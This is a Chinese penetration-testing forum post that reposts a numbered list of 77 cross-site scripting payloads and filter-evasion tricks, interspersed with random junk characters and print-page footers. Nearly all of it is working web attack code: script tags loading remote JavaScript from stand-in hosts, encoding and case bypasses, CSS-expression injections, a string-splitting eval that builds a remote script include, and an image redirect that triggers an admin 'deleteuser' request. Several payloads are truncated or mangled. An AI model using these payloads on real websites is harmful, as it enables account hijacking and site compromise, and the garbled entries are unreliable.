中国网络渗透测试联盟

标题: XSS攻击汇总 [打印本页]

---

作者: admin    时间: 2013-4-19 19:22
标题: XSS攻击汇总
貌似关于xss的资料t00ls比较少，看见好东西Copy过来，不知道有木有童鞋需要Mark的。
(1)普通的XSS JavaScript注入
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
& D7 S. y1 U1 r2 H(2)IMG标签XSS使用JavaScript命令
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
$ `5 _4 R! e: ]4 f3 a' a6 u  n(3)IMG标签无分号无引号
<IMG SRC=javascript:alert(‘XSS’)>
* Z+ `) x9 n, t6 _0 }(4)IMG标签大小写不敏感
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
9 _) d9 n) W4 i; d1 o(5)HTML编码(必须有分号)
; b/ p, d1 u% v<IMG SRC=javascript:alert(“XSS”)>
(6)修正缺陷IMG标签
* B2 ?& d( }0 ]) ]9 y<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>

9 |4 Z" \& i; |' z0 Q2 P8 @
(7)formCharCode标签(计算器)
! w/ l' ^/ n, I  O! l<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8)UTF-8的Unicode编码(计算器)
<IMG SRC=jav..省略..S')>
8 x0 o3 F: q+ L  a( Y" ?! U(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
<IMG SRC=jav..省略..S')>
( J) R2 R, I6 O7 W(10)十六进制编码也是没有分号(计算器)
7 q! Z3 x9 c; }' _<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>
* _4 l) G( K& ~+ ~  |) ](11)嵌入式标签,将Javascript分开
<IMG SRC=”jav ascript:alert(‘XSS’);”>
9 Y& O. J2 n9 t7 w# v: b& Z8 P/ M(12)嵌入式编码标签,将Javascript分开
<IMG SRC=”jav ascript:alert(‘XSS’);”>
/ A0 L0 O/ N5 E$ i(13)嵌入式换行符
* D" d8 n* f! S. `: V<IMG SRC=”jav ascript:alert(‘XSS’);”>
(14)嵌入式回车
$ d2 ?7 G; J3 ~<IMG SRC=”jav ascript:alert(‘XSS’);”>
3 R% U! }9 ?8 Z' F) p(15)嵌入式多行注入JavaScript,这是XSS极端的例子
+ b8 d& K$ b& J  ?7 Z$ Y2 B: q<IMG SRC=”javascript:alert(‘XSS‘)”>
(16)解决限制字符(要求同页面)
9 h# I8 p. _% p' g# Y<script>z=’document.’</script>
<script>z=z+’write(“‘</script>
<script>z=z+’<script’</script>
<script>z=z+’ src=ht’</script>
<script>z=z+’tp://ww’</script>
<script>z=z+’w.shell’</script>
( S9 T* S! `& b6 s" H4 B<script>z=z+’.net/1.’</script>
<script>z=z+’js></sc’</script>
<script>z=z+’ript>”)’</script>
- `4 f8 O+ o' D8 `( S1 q<script>eval_r(z)</script>
0 g5 t6 P" V- W% l(17)空字符12-7-1 T00LS - Powered by Discuz! Board
& J& @/ M2 V  H+ c; v* R$ qhttps://www.t00ls.net/viewthread ... table&tid=15267 2/6
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
(19)Spaces和meta前的IMG标签
<IMG SRC=” javascript:alert(‘XSS’);”>
7 w2 X* H2 ]# x3 u(20)Non-alpha-non-digit XSS
4 e8 h  \/ p5 R<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
(21)Non-alpha-non-digit XSS to 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
$ z- k3 Z% z: k' m" R% `$ z(22)Non-alpha-non-digit XSS to 3
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
(23)双开括号
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
0 M$ L& B9 v! K# B& l2 j5 F(24)无结束脚本标记(仅火狐等浏览器)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
; f2 }$ q7 [0 s/ H(25)无结束脚本标记2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26)半开的HTML/JavaScript XSS
<IMG SRC=”javascript:alert(‘XSS’)”
; F' z1 K" z' H  {' z* m+ o& {% M0 R(27)双开角括号
2 ^- \& b1 N2 s  M<iframe src=http://3w.org/XSS.html <
/ E3 Q$ s( L9 q/ D, f; R6 n2 P; M- ?' J(28)无单引号 双引号 分号
1 `( W" [. H- f<SCRIPT>a=/XSS/
% D! Z; p, ~7 {& Walert(a.source)</SCRIPT>
: {4 Y" ?' z! ?2 p+ ]5 E1 ~(29)换码过滤的JavaScript
\”;alert(‘XSS’);//
(30)结束Title标签
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
(31)Input Image
<INPUT SRC=”javascript:alert(‘XSS’);”>
(32)BODY Image
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
  E& X9 G+ Z3 I. M5 [(33)BODY标签
<BODY(‘XSS’)>
(34)IMG Dynsrc
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
(35)IMG Lowsrc
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
(36)BGSOUND
3 t) ]( U) C; b. P; H5 Q) d: y<BGSOUND SRC=”javascript:alert(‘XSS’);”>
" Z- ]6 `2 j$ C  a(37)STYLE sheet
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
. W. A# ?7 p+ N) D; \0 p( G, s/ ^8 S(38)远程样式表
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
(39)List-style-image(列表式)
0 _/ S+ B( Q- g<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
(40)IMG VBscript
# _. [0 m- p$ J, |<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
' S8 C$ w$ }  H3 v5 |(41)META链接url


<META HTTP-EQUIV=”refresh” CONTENT=”0;
  C* Q% {( u0 k, a& fURL=http://;URL=javascript:alert(‘XSS’);”>
% i/ ~$ H; c- m8 O( N1 D(42)Iframe
, ]$ X5 N$ F! Q- g4 q<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
8 `6 _) O( T$ ?/ K% f(43)Frame
9 g2 [" c" I5 z; e' Y6 v<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
: U( y1 a" j5 c0 o& f, Thttps://www.t00ls.net/viewthread ... table&tid=15267 3/6
4 r. p  h1 _$ V9 Z% c(44)Table
5 M. x5 v2 W) }/ c9 \<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
(45)TD
8 i# \6 e9 D# L% v( n<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
, ^: S; e- [4 y  u2 B; |(46)DIV background-image
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
. A6 X9 ~  [7 j& v(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
7 i: X! k/ m) K  s; N% {6 |8 }8 n8&13&12288&65279)
2 V4 m) n$ z' o  }) q/ `* F<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
(48)DIV expression
" v1 y7 ]1 [' m1 \<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
" P( }/ c- `: ~' O! e(49)STYLE属性分拆表达
  e! @3 i, z9 o<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
) `# R; h, l# B1 f' m- Z. y0 z(50)匿名STYLE(组成:开角号和一个字母开头)
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
(51)STYLE background-image
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
/ J) w  n+ F# }8 w, [CLASS=XSS></A>
(52)IMG STYLE方式
( L1 @- V/ `$ ~( q- g. B7 l/ c0 C2 qexppression(alert(“XSS”))’>
(53)STYLE background
<STYLE><STYLE
$ Q: P* S% m7 otype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
( K+ B0 D" X0 D: y(54)BASE
( g1 K% _9 N, j<BASE HREF=”javascript:alert(‘XSS’);//”>
. Y7 I- W$ D# ^8 V: V6 A(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
, J1 \  K0 [$ G% \<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
2 [( Z' ~2 y# L# K2 }1 d(56)在flash中使用ActionScrpt可以混进你XSS的代码
a=”get”;
" h- i8 v# ]# N. S( pb=”URL(\”";
* g' x3 b- s; n$ a3 Z1 C# q2 kc=”javascript:”;
d=”alert(‘XSS’);\”)”;
* ?4 |& {, Q! k  w# U5 |. ^8 W9 ^% seval_r(a+b+c+d);
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
5 c( B7 ~5 B! @/ U<HTML xmlns:xss>
9 ~5 C/ R8 d* t1 {$ v0 M  Q<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
. \9 U6 ~; v" q5 G7 ?8 Z<xss:xss>XSS</xss:xss>
</HTML>
# T, R0 d; R8 D0 O(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
. e6 [" a/ C/ X- A) R<SCRIPT SRC=””></SCRIPT>
(59)IMG嵌入式命令,可执行任意命令
  `$ \9 _7 t* W) N. J<IMG SRC=”http://www.XXX.com/a.php?a=b”>
5 s7 y7 W" ^$ _( V3 E8 a# {(60)IMG嵌入式命令(a.jpg在同服务器)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61)绕符号过滤
& f& M, `' d) `% r* u8 T<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
5 t) v' [! y6 A& g5 x8 r: C) t(62)
  W+ K, P8 m/ g; S& w4 t7 `<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
. ^# a9 h0 m$ u7 T/ j/ i' @/ i(63)
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
1 N) h" @# T# n7 l5 p(64)
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
) y# T# v) K5 S. k% X3 J(65)
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
(66)12-7-1 T00LS - Powered by Discuz! Board
# N" |8 x5 g! Ehttps://www.t00ls.net/viewthread ... table&tid=15267 4/6
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
$ l1 R& p0 G, G" \8 n4 [) t+ Y(67)
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
; M( a5 o6 e1 C5 _$ z</SCRIPT>
(68)URL绕行
2 G+ c/ J, g6 q6 \<A HREF=”http://127.0.0.1/”>XSS</A>
(69)URL编码
" u$ n* Q9 R( _5 q. E% |7 |<A HREF=”http://3w.org”>XSS</A>
8 F9 G1 E! P3 ]" j3 h7 x4 C6 S(70)IP十进制
<A HREF=”http://3232235521″>XSS</A>
(71)IP十六进制
) @2 \6 g# E! h8 p5 |<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
4 G+ I+ P: K* T& `) _: O! ]7 i(72)IP八进制
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
(73)混合编码
( U& u! M0 g7 f! Y( q<A HREF=”h
5 \/ v2 c; d0 r  w# y  ]8 vtt p://6 6.000146.0×7.147/”">XSS</A>
(74)节省[http:]
<A HREF=”//www.google.com/”>XSS</A>
(75)节省[www]
<A HREF=”http://google.com/”>XSS</A>
(76)绝对点绝对DNS
<A HREF=”http://www.google.com./”>XSS</A>
(77)javascript链接
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
3 J- s8 @3 O( k  h/ B8 ^) D
1 ?! D* q2 _( f原文地址：http://fuzzexp.org/u/0day/?p=14
9 o% I: z. x& l2 G

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2